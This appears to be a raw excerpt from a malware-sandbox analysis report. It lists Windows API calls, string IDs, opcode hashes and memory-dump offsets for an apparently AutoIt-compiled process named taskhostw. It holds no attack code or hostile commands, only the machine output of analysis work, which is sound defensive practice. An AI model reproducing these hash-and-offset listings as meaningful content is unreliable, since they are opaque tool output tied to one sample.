                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-86951937
                                                                  • Opcode ID: bbfe1157d4827eb6581cf14adb9609595696ba132b5c2bffdf4baf861aee948f
                                                                  • Instruction ID: 2c85346c2b4c06db6506c7aa01e40c4ac0a168899c4f3f7151598245b5f7466b
                                                                  • Opcode Fuzzy Hash: bbfe1157d4827eb6581cf14adb9609595696ba132b5c2bffdf4baf861aee948f
                                                                  • Instruction Fuzzy Hash: BF814AB0740601BBCB24AF21CD92FEE73A9AF35704F040025F905AB1D2EBA4DE55C6A5
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?), ref: 0023A935
                                                                  • SetTextColor.GDI32(?,?), ref: 0023A939
                                                                  • GetSysColorBrush.USER32 ref: 0023A94F
                                                                  • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A95A
                                                                  • CreateSolidBrush.GDI32(?), ref: 0023A95F
                                                                  • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023A977
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0023A985
                                                                  • SelectObject.GDI32(?,00000000), ref: 0023A996
                                                                  • SetBkColor.GDI32(?,00000000), ref: 0023A99F
                                                                  • SelectObject.GDI32(?,?), ref: 0023A9AC
                                                                  • InflateRect.USER32 ref: 0023A9CB
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0023A9E2
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0023A9F7
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0023AA1F
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0023A62C,?,?,00000000,?,?), ref: 0023AA46
                                                                  • InflateRect.USER32 ref: 0023AA64
                                                                  • DrawFocusRect.USER32 ref: 0023AA6F
                                                                  • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0023A62C), ref: 0023AA7D
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0023AA85
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0023AA99
                                                                  • SelectObject.GDI32(?,0023A62C), ref: 0023AAB0
                                                                  • DeleteObject.GDI32(?), ref: 0023AABB
                                                                  • SelectObject.GDI32(?,?), ref: 0023AAC1
                                                                  • DeleteObject.GDI32(?), ref: 0023AAC6
                                                                  • SetTextColor.GDI32(?,?), ref: 0023AACC
                                                                  • SetBkColor.GDI32(?,?), ref: 0023AAD6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 5a2e0d18bb6a85f21d42c3440e2e4fa2c2719594b9bf225f95724d340d8453f5
                                                                  • Instruction ID: 027edc57cd297903585cdd9325d3d13f67486c0dc7c6de53ed7cd6b0f763407f
                                                                  • Opcode Fuzzy Hash: 5a2e0d18bb6a85f21d42c3440e2e4fa2c2719594b9bf225f95724d340d8453f5
                                                                  • Instruction Fuzzy Hash: 68514DB1D10208FFDB119FA4ED48EAEBBB9EF08320F114625F955AB2A1D7719940CF90
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00238AF3
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00238B04
                                                                  • CharNextW.USER32(0000014E), ref: 00238B33
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00238B74
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00238B8A
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00238B9B
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00238BB8
                                                                  • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00238C0A
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00238C20
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00238C51
                                                                  • _memset.LIBCMT ref: 00238C76
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00238CBF
                                                                  • _memset.LIBCMT ref: 00238D1E
                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00238D48
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00238DA0
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00238E4D
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00238E6F
                                                                  • GetMenuItemInfoW.USER32 ref: 00238EB9
                                                                  • SetMenuItemInfoW.USER32 ref: 00238EE6
                                                                  • DrawMenuBar.USER32(?), ref: 00238EF5
                                                                  • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00238F1D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: 728d659d1fb9dc1708a22f908859b67863270a9d8237a3b344ffc9ebe6c1c182
                                                                  • Instruction ID: b4c563dbc3d521852ca80472ec0be014b70bf106f1a9cd01b404e1fbda7afcde
                                                                  • Opcode Fuzzy Hash: 728d659d1fb9dc1708a22f908859b67863270a9d8237a3b344ffc9ebe6c1c182
                                                                  • Instruction Fuzzy Hash: 44E1A1B0911309ABDF209F60DC89EEEBBB9FF15750F108156F9159A290DBB48A91CF60
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 00234A33
                                                                  • GetDesktopWindow.USER32 ref: 00234A48
                                                                  • GetWindowRect.USER32(00000000), ref: 00234A4F
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00234AB1
                                                                  • DestroyWindow.USER32 ref: 00234ADD
                                                                  • CreateWindowExW.USER32 ref: 00234B06
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00234B24
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00234B4A
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00234B5F
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00234B72
                                                                  • IsWindowVisible.USER32(?), ref: 00234B92
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00234BAD
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00234BC1
                                                                  • GetWindowRect.USER32(?,?), ref: 00234BD9
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00234BFF
                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00234C19
                                                                  • CopyRect.USER32(?,?), ref: 00234C30
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00234C9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: 768cadfa2b7053167f91df5ad4e7b5a50a3a59daf12ffea8104a374d04900915
                                                                  • Instruction ID: ff0408f5a5d0185be86c7127533836313e641633455db24bc43c32aee5665a34
                                                                  • Opcode Fuzzy Hash: 768cadfa2b7053167f91df5ad4e7b5a50a3a59daf12ffea8104a374d04900915
                                                                  • Instruction Fuzzy Hash: A1B1BBB0614301AFDB44EF24D989B6ABBE4FF88300F00895DF5999B2A1DB70EC15CB95
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002144ED
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00214513
                                                                  • _wcscpy.LIBCMT ref: 00214541
                                                                  • _wcscmp.LIBCMT ref: 0021454C
                                                                  • _wcscat.LIBCMT ref: 00214562
                                                                  • _wcsstr.LIBCMT ref: 0021456D
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00214589
                                                                  • _wcscat.LIBCMT ref: 002145D2
                                                                  • _wcscat.LIBCMT ref: 002145D9
                                                                  • _wcsncpy.LIBCMT ref: 00214604
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: d6c89f379b50dd3518c0e4b17742f9809b02a91cc18ca7845ca953cd1a2d55ab
                                                                  • Instruction ID: af2fb5271b0d65bccde9809d020613a67359892986efee499735883664fca4e4
                                                                  • Opcode Fuzzy Hash: d6c89f379b50dd3518c0e4b17742f9809b02a91cc18ca7845ca953cd1a2d55ab
                                                                  • Instruction Fuzzy Hash: 674108729102057BDB11BB60DC47FBF77ACDF76310F10001AF804E2292EB759A6196A5
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001B28BC
                                                                  • GetSystemMetrics.USER32(00000007), ref: 001B28C4
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001B28EF
                                                                  • GetSystemMetrics.USER32(00000008), ref: 001B28F7
                                                                  • GetSystemMetrics.USER32(00000004), ref: 001B291C
                                                                  • SetRect.USER32 ref: 001B2939
                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001B2949
                                                                  • CreateWindowExW.USER32 ref: 001B297C
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001B2990
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 001B29AE
                                                                  • GetStockObject.GDI32(00000011), ref: 001B29CA
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001B29D5
                                                                    • Part of subcall function 001B2344: GetCursorPos.USER32(?), ref: 001B2357
                                                                    • Part of subcall function 001B2344: ScreenToClient.USER32(002757B0,?), ref: 001B2374
                                                                    • Part of subcall function 001B2344: GetAsyncKeyState.USER32 ref: 001B2399
                                                                    • Part of subcall function 001B2344: GetAsyncKeyState.USER32 ref: 001B23A7
                                                                  • SetTimer.USER32(00000000,00000000,00000028,001B1256), ref: 001B29FC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI
                                                                  • API String ID: 1458621304-248962490
                                                                  • Opcode ID: c62209bdb5d402b8c411570993fb5c160fe2cec72178d7c035382aca2291c339
                                                                  • Instruction ID: af42f6d7eab84aad9b1b4c09142f150f48850d149406048ef55c56528883b986
                                                                  • Opcode Fuzzy Hash: c62209bdb5d402b8c411570993fb5c160fe2cec72178d7c035382aca2291c339
                                                                  • Instruction Fuzzy Hash: B4B15071A0061AEFDB14DFA8ED49BEDBBB4FB08711F104129FA19972A0DB74D851CB50
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0020A885
                                                                  • __swprintf.LIBCMT ref: 0020A926
                                                                  • _wcscmp.LIBCMT ref: 0020A939
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0020A98E
                                                                  • _wcscmp.LIBCMT ref: 0020A9CA
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 0020AA01
                                                                  • GetDlgCtrlID.USER32 ref: 0020AA53
                                                                  • GetWindowRect.USER32(?,?), ref: 0020AA89
                                                                  • GetParent.USER32(?), ref: 0020AAA7
                                                                  • ScreenToClient.USER32(00000000), ref: 0020AAAE
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0020AB28
                                                                  • _wcscmp.LIBCMT ref: 0020AB3C
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0020AB62
                                                                  • _wcscmp.LIBCMT ref: 0020AB76
                                                                    • Part of subcall function 001D37AC: _iswctype.LIBCMT ref: 001D37B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                  • String ID: %s%u
                                                                  • API String ID: 3744389584-679674701
                                                                  • Opcode ID: 6b51d88ea7916299600bdb03f968a3b81dc13df58d1b6e5c563de92e1ab708e4
                                                                  • Instruction ID: 642a6ca5b9b3fa98c037bf41464956843250cf55ca3f6d354b11b79d31a1bd5c
                                                                  • Opcode Fuzzy Hash: 6b51d88ea7916299600bdb03f968a3b81dc13df58d1b6e5c563de92e1ab708e4
                                                                  • Instruction Fuzzy Hash: 94A1D271624707AFD714DF20C884FAAB7E9FF54314F404629F9A9821D2DB30E965CB92
                                                                  APIs
                                                                    • Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 0023C691
                                                                    • Part of subcall function 0023AB69: ClientToScreen.USER32(?,?), ref: 0023AB92
                                                                    • Part of subcall function 0023AB69: GetWindowRect.USER32(?,?), ref: 0023AC08
                                                                    • Part of subcall function 0023AB69: PtInRect.USER32(?,?,0023C07E), ref: 0023AC18
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0023C6FA
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0023C705
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0023C728
                                                                  • _wcscat.LIBCMT ref: 0023C758
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0023C76F
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0023C788
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0023C79F
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 0023C7C1
                                                                  • DragFinish.SHELL32(?), ref: 0023C7C8
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0023C8BB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb'
                                                                  • API String ID: 169749273-1008854898
                                                                  • Opcode ID: d68adb1e18c84c92166eb1281b3f6d8bd2dc567b7ded837608f444a84b73fdbc
                                                                  • Instruction ID: 0f8d15ce8681acc69c9579d175a34013d953eb5a4dc057aa2b835be40db3dd0e
                                                                  • Opcode Fuzzy Hash: d68adb1e18c84c92166eb1281b3f6d8bd2dc567b7ded837608f444a84b73fdbc
                                                                  • Instruction Fuzzy Hash: 5D618C71518300AFC701EF60EC89D9BBBF8EF99710F10092EF6A5931A1DB709A59CB52
                                                                  APIs
                                                                  • LoadIconW.USER32 ref: 0020C2D3
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0020C2E5
                                                                  • SetWindowTextW.USER32(?,?), ref: 0020C2FC
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0020C311
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0020C317
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0020C327
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 0020C32D
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0020C34E
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0020C368
                                                                  • GetWindowRect.USER32(?,?), ref: 0020C371
                                                                  • SetWindowTextW.USER32(?,?), ref: 0020C3DC
                                                                  • GetDesktopWindow.USER32 ref: 0020C3E2
                                                                  • GetWindowRect.USER32(00000000), ref: 0020C3E9
                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0020C435
                                                                  • GetClientRect.USER32(?,?), ref: 0020C442
                                                                  • PostMessageW.USER32 ref: 0020C467
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0020C492
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: 2105a42037bc1d8e33c44c7bfc56a0179233420fa66ea074cd508d131e091dde
                                                                  • Instruction ID: 4226ca90801c2b774d4de3b92af99057351d251fa714319961df7becbc6d1a2a
                                                                  • Opcode Fuzzy Hash: 2105a42037bc1d8e33c44c7bfc56a0179233420fa66ea074cd508d131e091dde
                                                                  • Instruction Fuzzy Hash: BC51707090070AEFDB20DFA8EE8AB6EBBF5FF04704F104628E556A25A1C774A955CF50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0023A28B
                                                                  • DestroyWindow.USER32 ref: 0023A305
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                  • CreateWindowExW.USER32 ref: 0023A37F
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0023A3A1
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0023A3B4
                                                                  • DestroyWindow.USER32 ref: 0023A3D6
                                                                  • CreateWindowExW.USER32 ref: 0023A40D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0023A426
                                                                  • GetDesktopWindow.USER32 ref: 0023A43F
                                                                  • GetWindowRect.USER32(00000000), ref: 0023A446
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0023A45E
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0023A476
                                                                    • Part of subcall function 001B25DB: GetWindowLongW.USER32(?,000000EB), ref: 001B25EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 1297703922-3619404913
                                                                  • Opcode ID: 7b502d1f0287b06def05a2a5c88b62589c839aba0e2f8aca677b0c146366142a
                                                                  • Instruction ID: b10d18563693ebe0c05101f4c1a5e5dea67b7466e5ff297af6b3fcd5bc39cfea
                                                                  • Opcode Fuzzy Hash: 7b502d1f0287b06def05a2a5c88b62589c839aba0e2f8aca677b0c146366142a
                                                                  • Instruction Fuzzy Hash: A87159B1560245AFD724CF28EC49FA677E9EB88700F04462DF995872A0D7B1A952CF12
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 0023448D
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002344D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                  • API String ID: 3974292440-4258414348
                                                                  • Opcode ID: 6f5a2eed91d55d06eb7ee1410c925d36291cba22c5ebcb665cc95eb5ce060ab3
                                                                  • Instruction ID: 027ba911ad8dc0acd59d53adf28b35559a35d35004fcc15c09be32237b8dee5b
                                                                  • Opcode Fuzzy Hash: 6f5a2eed91d55d06eb7ee1410c925d36291cba22c5ebcb665cc95eb5ce060ab3
                                                                  • Instruction Fuzzy Hash: 549192702247019FCB14FF20C891A69B7A5AFA5314F4444ADF8965B7A3CB31FD6ACB81
                                                                  APIs
                                                                    • Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
                                                                    • Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0021A455
                                                                  • GetDriveTypeW.KERNEL32 ref: 0021A4A2
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021A4EA
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021A521
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021A54F
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
